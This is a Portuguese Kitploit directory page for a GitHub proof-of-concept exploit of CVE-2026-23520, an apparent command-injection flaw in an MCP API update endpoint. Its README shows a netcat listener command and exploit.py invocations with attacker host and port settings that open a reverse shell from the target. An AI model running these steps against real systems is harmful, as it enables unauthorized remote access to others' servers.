Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23520 — Prova de conceito de exploit para CVE-2026-23520, uma vulnerabilidade de injeção de comandos no serviço de atualização do Arcane, permitindo execução remota de código por meio de requisições de API manipuladas. | Kitploit
Ferramentas/GitHubGitHub/cypher-21/cve-2026-23520
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubcypher-21/cve-2026-23520

CVE-2026-23520

Prova de conceito de exploit para CVE-2026-23520, uma vulnerabilidade de injeção de comandos no serviço de atualização do Arcane, permitindo execução remota de código por meio de requisições de API manipuladas.

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23520

PoC de Execução Remota de Comandos (RCE) na API MCP


📌 Visão Geral

Este repositório contém uma Prova de Conceito (PoC) de exploit para uma vulnerabilidade de Execução Remota de Comandos (RCE) que afeta aplicações que expõem um endpoint de API MCP vulnerável (comumente /api/mcp/connect).

A vulnerabilidade permite a execução de comandos a nível de sistema por meio de uma solicitação de API manipulada.


🚀 Início Rápido

1. Inicie um listener

root@kitploit:~
nc -lvnp ATTACKER_PORT

2. Execute o exploit

root@kitploit:~
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT

📥 Uso

root@kitploit:~
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]

🔑 Argumentos Obrigatórios

ArgumentoDescrição
targetIP, domínio ou URL do alvo
--lhostIP do atacante
--lportPorta do atacante

🔧 Argumentos Opcionais

FlagDescrição
-p, --portPorta do alvo (padrão: 443)
-s, --schemehttp ou https (padrão: https)
-e, --endpointCaminho do endpoint da API
-t, --timeoutTempo limite da solicitação
-v, --verboseSaída de depuração

🧪 Exemplos

root@kitploit:~
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
root@kitploit:~
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444

🧠 Observações

  • Um timeout não indica necessariamente falha.
  • Certifique-se de que seu listener esteja em execução antes da exploração.
  • O payload pressupõe que /bin/bash esteja disponível.

⚠️ Aviso Legal

Apenas para testes autorizados e fins educacionais.


👨‍💻 Autor

Parosh B

Baixar ferramenta